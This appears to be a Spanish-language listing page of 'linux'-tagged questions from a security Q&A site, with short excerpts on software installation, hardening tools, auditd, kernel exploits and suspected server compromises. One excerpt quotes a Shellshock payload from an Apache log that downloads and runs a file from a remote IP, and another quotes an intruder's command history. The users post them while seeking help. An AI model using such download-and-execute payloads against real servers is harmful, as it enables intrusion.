Preguntas con etiqueta 'linux'

1
respuesta

Instalando aplicaciones con diferentes cuentas de usuario en linux

Tengo una pregunta básica sobre la instalación de aplicaciones en el sistema operativo Linux, usando la base de datos Oracle como ejemplo. Al instalar el paquete de base de datos Oracle, creé un usuario llamado ora112 , un grupo llamado...
hecha 11.06.2012 - 09:21
1
respuesta

Los registros de Apache muestran la ejecución de los comandos

Me pregunto si mi servidor está comprometido o no. Solo miré mi registro y vi la siguiente línea allí: IP: 173.249.4.160, Date: 27-12-17, Time:09:52:51, Browser: () { :;}; /bin/bash -c "curl -o /tmp/zmuie http://162.243.117.130/zmuie;/usr/bi...
hecha 28.12.2017 - 19:24
2
respuestas

¿Comprobación de vulnerabilidades de hardware (como Intel Management Engine) semiautomatizadas?

¿Existe una buena forma semiautomática de que solo pegue la salida de mi /proc , lspci , o cualquier otra descripción de hardware y obtenga sugerencias sobre a qué tipo de vulnerabilidades puede estar sujeta una computadora determina...
hecha 18.12.2017 - 19:58
3
respuestas

¿Qué tan útil es evitar que las aplicaciones de Linux configuren conexiones que no sean de confianza? ¿Se puede hacer fácilmente?

Amenaza: su máquina Linux se ve comprometida de alguna manera (aplicación no confiable o paquete o actualización de instalación comprometida, o una aplicación está comprometida debido a una vulnerabilidad, etc.) y algo en su sistema intenta "lla...
hecha 16.09.2018 - 13:32
1
respuesta

¿Auditd registro relacionado con SELinux? [cerrado]

¿Existe alguna relación entre auditd y SELinux? ¿O podemos usar auditd incluso si SELinux está deshabilitado?     
hecha 05.09.2018 - 07:58
1
respuesta

diferencia entre Lynis y Nessus y otra herramienta de endurecimiento

Estoy escribiendo una herramienta Python de código abierto destinada a inventariar / auditar y endurecer un sistema. Cuando empecé con el proyecto, investigué un poco y me di cuenta de que no había muchas herramientas (al menos de código abierto...
hecha 15.05.2017 - 11:20
1
respuesta

Desbordamiento de pila de Kernel x86 32 bits - sobrescribiendo los resultados de EIP en __kernel_vsyscall + 9 [cerrado]

¿Por qué segfaults en __kernel_vsyscall + 9? Se realizó una inspección de EIP, interrumpida justo después de fwrite (), línea 93 en exp.c (gdb) x/10x 0xb7fd9ce5 0xb7fd9ce5 <__kernel_vsyscall+9>: 0xc3595a5d 0x90909090 0x5800768d...
hecha 09.10.2017 - 13:23
1
respuesta

¿Posible vulnerabilidad de seguridad?

En un pentest en una máquina interna en la red de mi empresa, una máquina Linux (Debian) tenía enlaces simbólicos en la carpeta var / www al directorio / etc /. La enumeración adicional mostró que había una secuencia de comandos de bash que resp...
hecha 28.08.2017 - 18:15
1
respuesta

¿Podemos saber hasta qué punto ha llegado el hacker en su intento?

Descubrí 'accidentalmente' al buscar en mi historial de comandos, que alguien ha emitido estos: passwd w cat /proc/cpuinfo free -m uptime w perl v.py python v.py chmod +x * ./a 94.10 y estos: ./a 52.30 rm -rf scan.log sparte.txt ./a 208.4...
hecha 07.04.2018 - 11:54
3
respuestas

¿Es una buena práctica hacer proxy de aplicaciones web desde contenedores de Docker?

La configuración actual es la siguiente: Un servidor de producción (host) tiene solo unos pocos puertos abiertos, a saber, HTTP, HTTPS y puertos seguros para correo electrónico. En el host hay un usuario sin privilegios que ejecuta un moto...
hecha 24.01.2017 - 17:13